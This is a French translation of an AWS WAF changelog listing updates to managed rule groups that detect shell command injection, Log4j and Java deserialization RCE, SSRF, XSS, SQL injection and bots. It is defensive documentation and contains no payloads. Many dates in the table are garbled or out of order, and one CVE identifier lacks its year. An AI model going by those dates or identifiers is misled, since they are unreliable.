| [Groupe de règles géré par le système d'exploitation Windows](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-windows-os) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 2.2 de ce groupe de règles.  La transformation de texte JS\$1DECODE a été ajoutée aux règles répertoriées.   | 2024-07-03 | 
| [Groupe de règles géré par le système d'exploitation Linux](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-linux-os) Toutes les règles  | A publié la version statique 2.3 de ce groupe de règles.  Signatures ajoutées pour améliorer la détection.   | 2024-06-06 | 
| [AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md) [AWS WAF Groupe de règles de prévention des prises de contrôle des fraudes (ATP)](aws-managed-rule-groups-atp.md) [AWS WAF Groupe de règles de prévention de la fraude (ACFP) pour la création de comptes et la prévention des fraudes](aws-managed-rule-groups-acfp.md)  | Les groupes de règles relatives aux robots et aux fraudes sont désormais versionnés. Si vous utilisez l'un de ces groupes de règles, cette mise à jour ne modifie pas la façon dont il gère votre trafic Web.  Cette mise à jour définit la version actuelle du groupe de règles sur la version statique 1.0 et définit la version par défaut pour qu'elle pointe vers celui-ci.  Pour plus d'informations sur les règles gérées versionnées, consultez les rubriques suivantes :  [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | 29/05/2024 | 
| [Groupe de règles géré par le système d'exploitation POSIX](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-posix-os) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 3.0 de ce groupe de règles.  `UNIXShellCommandsVariables_QUERYARGUMENTS`Supprimé et remplacé par`UNIXShellCommandsVariables_QUERYSTRING`. Si vous avez des règles qui correspondent sur l'étiquette pour`UNIXShellCommandsVariables_QUERYARGUMENTS`, lorsque vous utiliserez cette version, remplacez-les pour qu'elles correspondent à l'étiquette pour`UNIXShellCommandsVariables_QUERYSTRING`. Le nouveau label est`awswaf:managed:aws:posix-os:UNIXShellCommandsVariables_QueryString`. Ajout de la règle`UNIXShellCommandsVariables_HEADER`, qui correspond à tous les en-têtes. Toutes les règles du groupe de règles géré ont été mises à jour avec une logique de détection améliorée.  Correction de la capitalisation documentée de l'étiquette pour`UNIXShellCommandsVariables_BODY`.   | 28/05/2024 | 
| [Groupe de règles géré par un ensemble de règles de base (CRS)](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-crs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 1.12 de ce groupe de règles.  Ajout de signatures à toutes les règles de script intersites afin d'améliorer la détection et de réduire le nombre de faux positifs.  | 21/05/2021 | 
| [Groupe de règles géré par base de données SQL](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-sql-db) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  |  A publié la version statique 1.2 de ce groupe de règles. La transformation de `JS_DECODE` texte a été ajoutée aux règles répertoriées.   | 14-05-2024/ | 
| [Groupe de règles géré pour les entrées erronées connues](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-known-bad-inputs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 1.22 de ce groupe de règles. La transformation de `JS_DECODE` texte a été ajoutée aux règles répertoriées.   | 08-05-2024/ | 
| [Groupe de règles géré par le système d'exploitation POSIX](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-posix-os)  | A publié la version statique 2.2 de ce groupe de règles.  La transformation du `JS_DECODE` texte a été ajoutée aux deux règles.   | 08-05-2024/ | 
| [Groupe de règles géré par le système d'exploitation Windows](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-windows-os) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 2.1 de ce groupe de règles.  Ajout de signatures `PowerShellCommands_BODY` pour améliorer la détection.   | 03/05/2024 | 
| [Groupe de règles géré par Amazon IP Reputation](aws-managed-rule-groups-ip-rep.md#aws-managed-rule-groups-ip-rep-amazon) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | Mise à jour des sources de la liste de réputation des adresses IP, afin d'améliorer l'identification des adresses activement impliquées dans des activités malveillantes et de réduire le nombre de faux positifs.  Cette mise à jour n'implique pas de nouvelle version car ce groupe de règles n'est pas versionné.   | 13/03/2024 | 
| [Groupe de règles géré pour les entrées erronées connues](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-known-bad-inputs)  | A publié la version statique 1.21 de ce groupe de règles. Ajout de signatures pour améliorer la détection et réduire le nombre de faux positifs.   | 16/12/2023 | 
| [Groupe de règles géré pour les entrées erronées connues](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-known-bad-inputs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 1.20 de ce groupe de règles. Mise à jour de la `ExploitablePaths_URIPATH` règle pour ajouter la détection des demandes correspondant à la vulnérabilité d'autorisation incorrecte CVE-2023-22518 d'Atlassian Confluence. Cette vulnérabilité affecte toutes les versions de Confluence Data Center et Server. Pour plus d'informations, voir [NIST : National Vulnerability Database : CVE-2023-22518](https://nvd.nist.gov/vuln/detail/CVE-2023-22518) Detail.  | 14/12/2023 | 
| [Groupe de règles géré par un ensemble de règles de base (CRS)](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-crs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 1.11 de ce groupe de règles.  Ajout de signatures à toutes les règles de script intersites afin d'améliorer la détection et de réduire le nombre de faux positifs.  | 06/12/2023 | 
| [AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | L'étiquette de faible activité coordonnée a été ajoutée aux étiquettes de niveau de protection ciblées du groupe de règles. Cette étiquette n'est associée à aucune règle. Cet étiquetage s'ajoute aux règles et labels de niveau moyen et élevé.  | 23/12-05 | 
| [Étiquettes Bot Control](aws-managed-rule-groups-bot.md#aws-managed-rule-groups-bot-labels-rg) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | Ajout d'une étiquette de signal au groupe de règles indiquant la détection d'une extension de navigateur facilitant l'automatisation. Cette étiquette n'est pas spécifique à une règle individuelle.   | 14/11/2023 | 
| [Groupe de règles géré par un ensemble de règles de base (CRS)](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-crs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 1.10 de ce groupe de règles.  Mise à jour d'une règle pour améliorer la détection et réduire le nombre de faux positifs.  | 02/11/2023 | 
| [Groupe de règles géré par un ensemble de règles de base (CRS)](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-crs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 1.9 de ce groupe de règles.  Règles mises à jour pour améliorer la détection et réduire les faux positifs.  | 30/10/2023 | 
| [Groupe de règles géré par le système d'exploitation POSIX](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-posix-os) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 2.1 de ce groupe de règles.  Mise à jour de la règle des arguments de requête pour améliorer la détection.   | 2023-10-12 | 
| [Groupe de règles géré par un ensemble de règles de base (CRS)](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-crs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 1.8 de ce groupe de règles.  Règles mises à jour pour améliorer la détection.  | 11/10/2023 | 
| [Groupe de règles géré pour les entrées erronées connues](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-known-bad-inputs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | Déploiement exceptionnel : publication de la version statique 1.19 de ce groupe de règles. Mise à jour de la version par défaut pour utiliser la version 1.19. Mise à jour de la `ExploitablePaths_URIPATH` règle afin d'ajouter la détection des demandes correspondant à la vulnérabilité d'escalade de privilèges CVE-2023-22515 d'Atlassian Confluence. Cette vulnérabilité affecte certaines versions d'Atlassian Confluence. Pour plus d'informations, consultez [NIST : National Vulnerability Database : CVE-2023-22515 Detail et [Atlassian](https://confluence.atlassian.com/kb/faq-for-cve-2023-22515-1295682188.html) Support : FAQ pour CVE-2023-22515](https://nvd.nist.gov/vuln/detail/CVE-2023-22515). Pour plus d'informations sur ce type de déploiement, consultez[Déploiements exceptionnels pour les règles AWS gérées](waf-managed-rule-groups-deployments-exceptions.md). | 04/10/2023 | 
| [Groupe de règles géré pour les entrées erronées connues](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-known-bad-inputs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | Déploiement exceptionnel : publication de la version statique 1.18 de ce groupe de règles. Il s'agit d'un déploiement rapide de cette version statique pour permettre la création et le déploiement de la version 1.19.  Mise à jour de la `Host_localhost_HEADER` règle et de toutes les règles de désérialisation de Log4J et Java pour une meilleure détection.  Pour plus d'informations sur ce type de déploiement, consultez[Déploiements exceptionnels pour les règles AWS gérées](waf-managed-rule-groups-deployments-exceptions.md). | 04/10/2023 | 
| [AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | Des règles ont été ajoutées au groupe de règles avec Count action.  La règle IP de réutilisation des jetons détecte et compte le partage de jetons entre les adresses IP.  Les règles d'activité coordonnées utilisent une analyse automatisée du trafic du site Web par apprentissage automatique (ML) pour détecter les activités liées aux robots. Dans la configuration de votre groupe de règles, vous pouvez refuser l'utilisation du ML. Avec cette version, les clients qui utilisent actuellement le niveau de protection ciblé ont opté pour l'utilisation du ML. La désinscription désactive les règles d'activité coordonnées.  | 06/09/2023 | 
| [AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | La règle a été ajoutée `CategoryAI` au groupe de règles.  | 30/08/2023 | 
| [Groupe de règles géré par un ensemble de règles de base (CRS)](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-crs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 1.7 de ce groupe de règles.  Extensions restreintes mises à jour et règles SSRF des métadonnées EC2 pour améliorer la détection et réduire les faux positifs.  | 26/07/2023 | 
| [AWS WAF Groupe de règles de prévention de la fraude (ACFP) pour la création de comptes et la prévention des fraudes](aws-managed-rule-groups-acfp.md) Toutes les règles du nouveau groupe de règles  | Le groupe de règles a été ajoutéAWSManagedRulesACFPRuleSet.  | 13/06/2023 | 
| [Groupe de règles géré par le système d'exploitation Linux](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-linux-os) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 2.2 de ce groupe de règles.  Signatures ajoutées pour améliorer la détection.   | 22/05/2023 | 
| [Groupe de règles géré par un ensemble de règles de base (CRS)](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-crs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 1.6 de ce groupe de règles.  Mise à jour du cross-site scripting (XSS) et règles d'extension restreintes pour améliorer la détection et réduire les faux positifs.  | 28/04/2023 | 
| [Groupe de règles géré par une application PHP](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-php-app) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 2.0 de ce groupe de règles.  Signatures ajoutées pour améliorer la détection dans toutes les règles.  La règle `PHPHighRiskMethodsVariables_QUERYARGUMENTS` a été remplacée par`PHPHighRiskMethodsVariables_QUERYSTRING`, qui inspecte l'intégralité de la chaîne de requête au lieu de se limiter aux arguments de la requête.  Ajout de la règle`PHPHighRiskMethodsVariables_HEADER`, pour étendre la couverture afin d'inclure tous les en-têtes. Les libellés suivants ont été mis à jour pour les aligner sur l'étiquetage standard des règles AWS gérées : [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | 27/02/2023 | 
| [AWS WAF Groupe de règles de prévention des prises de contrôle des fraudes (ATP)](aws-managed-rule-groups-atp.md)[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | Ajout de règles d'inspection des réponses de connexion à utiliser avec les CloudFront distributions Amazon protégées. Ces règles peuvent bloquer les nouvelles tentatives de connexion provenant d'adresses IP et de sessions client qui ont récemment été à l'origine d'un trop grand nombre de tentatives de connexion infructueuses.  | 15/02/2023 | 
| [Groupe de règles géré par un ensemble de règles de base (CRS)](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-crs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 1.5 de ce groupe de règles.  Filtres XSS (Cross Site Scripting) mis à jour pour améliorer la détection.  | 25/01/2023 | 
| [Groupe de règles géré par le système d'exploitation Linux](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-linux-os) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 2.1 de ce groupe de règles.  Suppression de la règle `LFI_COOKIE` et de son étiquette`awswaf:managed:aws:linux-os:LFI_Cookie`, et remplacée par la nouvelle règle `LFI_HEADER` et son étiquette`awswaf:managed:aws:linux-os:LFI_Header`. Cette modification étend l'inspection à plusieurs en-têtes.  Des transformations de texte et des signatures ont été ajoutées à toutes les règles pour améliorer la détection.  | 15 décembre | 
| [Groupe de règles géré par un ensemble de règles de base (CRS)](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-crs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 1.4 de ce groupe de règles.  Ajout d'une transformation de texte `NoUserAgent_HEADER` pour supprimer tous les octets nuls. Mise à jour des filtres dans les règles de script intersite afin d'améliorer la détection.  | 05.12-05 | 
| [Groupe de règles géré pour les entrées erronées connues](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-known-bad-inputs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 1.17 de ce groupe de règles.  Mise à jour des règles de désérialisation de Java afin d'ajouter la détection des requêtes correspondant à Apache CVE-42889, une vulnérabilité d'exécution de code à distance (RCE) dans les versions d'Apache Commons Text antérieures à la version 1.10.0. Pour plus d'informations, consultez [NIST : National Vulnerability Database : CVE-42889 Detail et CVE-42889](https://nvd.nist.gov/vuln/detail/CVE-2022-42889) [: Apache Commons Text antérieur à la version 1.10.0 autorise le RCE lorsqu'il est appliqué à](https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om) des entrées non fiables en raison de valeurs d'interpolation par défaut non sécurisées. Détection améliorée dans`Host_localhost_HEADER`. | 10-20 | 
| [Groupe de règles géré pour les entrées erronées connues](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-known-bad-inputs)[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 1.16 de ce groupe de règles.  Suppression des faux positifs AWS identifiés dans la version 1.15. | 05.10-05 | 
| [Groupe de règles géré par le système d'exploitation POSIX](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-posix-os) [Groupe de règles géré par une application PHP](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-php-app)  [WordPress groupe de règles géré par les applications](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-wordpress-app)   | Les noms d'étiquettes documentés ont été corrigés.   | 09-19 | 
| [Groupes de règles de réputation IP](aws-managed-rule-groups-ip-rep.md) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | Cette modification ne modifie pas la façon dont le groupe de règles gère le trafic Web. Ajout d'une nouvelle règle Count permettant d'inspecter les adresses IP activement impliquées dans des activités DDo S, selon Amazon Threat Intelligence.  | 08-30 | 
| [Groupe de règles géré pour les entrées erronées connues](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-known-bad-inputs)[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 1.15 de ce groupe de règles.  `Log4JRCE`Supprimé et remplacé par`Log4JRCE_HEADER`,`Log4JRCE_QUERYSTRING`, et `Log4JRCE_URI``Log4JRCE_BODY`, pour une surveillance et une gestion plus précises des faux positifs.  Des signatures ont été ajoutées pour améliorer la détection et le blocage de tous `PROPFIND_METHOD` `JavaDeserializationRCE*` et de toutes les `Log4JRCE*` règles.  Libellés mis à jour pour corriger la capitalisation dans `Host_localhost_HEADER` et dans toutes les `JavaDeserializationRCE*` règles.  Correction de la description de`JavaDeserializationRCE_HEADER`. | 22/08 | 
| [AWS WAF Groupe de règles de prévention des prises de contrôle des fraudes (ATP)](aws-managed-rule-groups-atp.md)[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | Ajout d'une règle pour empêcher l'utilisation du groupe de règles géré de prévention du piratage de compte pour le trafic Web du groupe d'utilisateurs Amazon Cognito.  | 08-11 | 
| [Groupe de règles géré par un ensemble de règles de base (CRS)](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-crs)  | AWS a une date d'expiration planifiée pour les versions `Version_1.2` et pour le groupe `Version_2.0` de règles. Les versions expireront le 9 septembre 2022. Pour plus d'informations sur l'expiration des versions, consultez[Utilisation de groupes de règles gérés versionnés dans AWS WAF](waf-managed-rule-groups-versioning.md). | 09/06/2018 | 
| [Groupe de règles géré par un ensemble de règles de base (CRS)](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-crs)[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version 1.3 de ce groupe de règles. Cette version met à jour les signatures de correspondance dans les règles `GenericLFI_URIPATH` et`GenericRFI_URIPATH`, pour améliorer la détection.  | 24/05/2018 | 
| [AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md)[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | La règle a été ajoutée `CategoryEmailClient` au groupe de règles.  | 06/04/2018 | 
| [Groupe de règles géré pour les entrées erronées connues](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-known-bad-inputs)[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version 1.14 de ce groupe de règles. Les quatre `JavaDeserializtionRCE` règles passent en Block mode. | 31 mars | 
| [Groupe de règles géré pour les entrées erronées connues](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-known-bad-inputs)[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version 1.13 de ce groupe de règles. Mise à jour de la transformation de texte pour les vulnérabilités Spring Core et Cloud Function RCE. Ces règles sont en mode décompte pour recueillir des métriques et évaluer les modèles correspondants. L'étiquette peut être utilisée pour bloquer les demandes dans une règle personnalisée. Une version ultérieure sera déployée avec ces règles en mode bloc. | 31 mars | 
| [Groupe de règles géré pour les entrées erronées connues](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-known-bad-inputs)[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version 1.12 de ce groupe de règles. Signatures ajoutées pour les vulnérabilités Spring Core et Cloud Function RCE. Ces règles sont en mode décompte pour recueillir des métriques et évaluer les modèles correspondants. L'étiquette peut être utilisée pour bloquer les demandes dans une règle personnalisée. Une version ultérieure sera déployée avec ces règles en mode bloc. Suppression des règles `Log4JRCE_HEADER``Log4JRCE_QUERYSTRING`,`Log4JRCE_URI`, `Log4JRCE_BODY` et et remplacées par la règle`Log4JRCE`. | 30/03/2018 | 
| [Groupes de règles de réputation IP](aws-managed-rule-groups-ip-rep.md) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | La AWSManagedReconnaissanceList règle a été mise à jour pour changer l'action du nombre à l'action en bloquant.  | 15 février | 
| [AWS WAF Groupe de règles de prévention des prises de contrôle des fraudes (ATP)](aws-managed-rule-groups-atp.md) Toutes les règles du nouveau groupe de règles  | Le groupe de règles a été ajoutéAWSManagedRulesATPRuleSet.  | 11 février | 
| [Groupe de règles géré pour les entrées erronées connues](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-known-bad-inputs)[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version 1.9 de ce groupe de règles. Suppression de la règle `Log4JRCE` et remplacée par les règles`Log4JRCE_HEADER`,`Log4JRCE_QUERYSTRING`,`Log4JRCE_URI`, et`Log4JRCE_BODY`, pour plus de flexibilité dans l'utilisation de cette fonctionnalité. Signatures ajoutées pour améliorer la détection et le blocage. | 28/01/2018 | 
| Ensemble de règles de base (CRS) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  |  A publié la version 2.0 de ce groupe de règles. Pour ces règles, les signatures de détection ont été ajustées afin de réduire le nombre de faux positifs. La transformation de `URL_DECODE` texte a été remplacée par la transformation de `URL_DECODE_UNI` texte double. Ajout de la transformation `HTML_ENTITY_DECODE` du texte.  | 01/01/10 | 
| Ensemble de règles de base (CRS) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  |  Dans le cadre de la publication de la version 2.0 de ce groupe de règles, la transformation du `URL_DECODE_UNI` texte a été ajoutée. Suppression de la transformation de `URL_DECODE` texte de`RestrictedExtensions_URIPATH`.  | 01/01/10 | 
| Base de données SQL [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  |  A publié la version 2.0 de ce groupe de règles. Remplace la transformation de `URL_DECODE` texte par la transformation de `URL_DECODE_UNI` texte double et ajout de la transformation de `COMPRESS_WHITE_SPACE` texte. Ajout de signatures de détection supplémentaires à`SQLiExtendedPatterns_QUERYARGUMENTS`. L'inspection JSON a été ajoutée à`SQLi_BODY`. Ajout de la règle`SQLiExtendedPatterns_BODY`. Suppression de la règle`SQLi_URIPATH`.  | 01/01/10 | 
| Entrées erronées connues [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | Publication de la version 1.8 de la règle `Log4JRCE` pour améliorer l'inspection des en-têtes et les critères de correspondance. | 17/12/2021 | 
| Entrées erronées connues [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | Publication de la version 1.4 de la règle `Log4JRCE` pour ajuster les critères de correspondance et inspecter les en-têtes supplémentaires. Sortie de la version 1.5 pour ajuster les critères de correspondance. | 11/12/2021 | 
| Entrées erronées connues [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | Ajout de la `Log4JRCE` version 1.2 de la règle en réponse au problème de sécurité récemment révélé dans Log4j. Pour plus d'informations, voir [CVE-2021-44228](https://www.cve.org/CVERecord?id=CVE-2021-44228). Cette règle inspecte les chemins d'URI courants, les chaînes de requête, les 8 premiers Ko du corps de la demande et les en-têtes communs. La règle utilise des transformations de `URL_DECODE_UNI` texte double. A publié la version 1.3 de `Log4JRCE` pour ajuster les critères de correspondance et inspecter les en-têtes supplémentaires.  Suppression de la règle`BadAuthToken_COOKIE_AUTHORIZATION`.  | 2021-12-10 | 

Le tableau suivant répertorie les modifications apportées avant décembre 2021. 


| Groupe de règles et règles | Description | Date | 
| --- | --- | --- | 
| Liste de réputation des adresses IP Amazon | `AWSManagedReconnaissanceList` | Ajout de la AWSManagedReconnaissanceList règle en mode surveillance/comptage. Cette règle contient les adresses IP qui effectuent une reconnaissance par rapport AWS aux ressources. | 23/11/2021 | 
| Système d'exploitation Windows |  `WindowsShellCommands` `PowerShellCommands`  |  Ajout de trois nouvelles règles pour WindowsShell les commandes : `WindowsShellCommands_COOKIE``WindowsShellCommands_QUERYARGUMENTS`, et`WindowsShellCommands_BODY`. Ajout d'une nouvelle PowerShell règle :`PowerShellCommands_COOKIE`. Restructuration de la dénomination `PowerShellComands` des règles en supprimant les chaînes \$1Set1 et \$1Set2. Des signatures de détection plus complètes ont été ajoutées à`PowerShellRules`. Ajout d'une transformation de `URL_DECODE_UNI` texte à toutes les règles du système d'exploitation Windows.  | 23/11/2021 | 
| Système d'exploitation Linux |  `LFI_URIPATH` `LFI_QUERYSTRING` `LFI_BODY` `LFI_COOKIE`  |  La double transformation de `URL_DECODE` texte a été remplacée par une double transformation`URL_DECODE_UNI`. Ajouté `NORMALIZE_PATH_WIN` en tant que deuxième transformation de texte. A remplacé la `LFI_BODY` règle par la `LFI_COOKIE` règle. Ajout de signatures de détection plus complètes pour toutes les `LFI` règles.  | 23/11/2021 | 
| Ensemble de règles de base (CRS) |  `SizeRestrictions_BODY`  | Réduction de la limite de taille pour bloquer les requêtes Web dont la charge utile corporelle est supérieure à 8 Ko. Auparavant, la limite était de 10 Ko.  | 2021-10-27 | 
| Ensemble de règles de base (CRS) |  `EC2MetaDataSSRF_BODY` `EC2MetaDataSSRF_COOKIE` `EC2MetaDataSSRF_URIPATH` `EC2MetaDataSSRF_QUERYARGUMENTS`  | Ajout de nouvelles signatures de détection. Ajout d'un double décodage d'URL Unicode pour améliorer le blocage.  | 2021-10-27 | 
| Ensemble de règles de base (CRS) |  `GenericLFI_QUERYARGUMENTS` `GenericLFI_URIPATH` `RestrictedExtensions_URIPATH` `RestrictedExtensions_QUERYARGUMENTS`  | Ajout d'un double décodage d'URL Unicode pour améliorer le blocage.  | 2021-10-27 | 
| Ensemble de règles de base (CRS) |  `GenericRFI_QUERYARGUMENTS` `GenericRFI_BODY` `GenericRFI_URIPATH`  | Mise à jour des signatures de règles afin de réduire le nombre de faux positifs, en fonction des commentaires des clients. Ajout d'un double décodage d'URL Unicode pour améliorer le blocage.  | 2021-10-27 | 
| Tous | Toutes les règles | Ajout de la prise en charge des AWS WAF étiquettes à toutes les règles qui ne prenaient pas déjà en charge l'étiquetage.  | 2021-10-25 | 
| Liste de réputation des adresses IP Amazon | `AWSManagedIPReputationList_xxxx` | Restructuration de la liste de réputation IP, suppression des suffixes du nom de la règle et ajout de la prise en charge des étiquettes. AWS WAF  | 04/05/2021 | 
| Liste des adresses IP anonymes | `AnonymousIPList` `HostingProviderList` | Ajout du support pour les AWS WAF étiquettes.  | 04/05/2021 | 
| Contrôle des robots | Tous | Ajout de l'ensemble de règles Bot Control.  | 01-04-2021 | 
| Ensemble de règles de base (CRS) | `GenericRFI_QUERYARGUMENTS`  | Ajout d'un double décodage d'URL.  | 03/03/2021 | 
| Ensemble de règles de base (CRS) | `RestrictedExtensions_URIPATH`  | Amélioration de la configuration des règles et ajout d'un décodage d'URL supplémentaire.  | 03/03/2021 | 
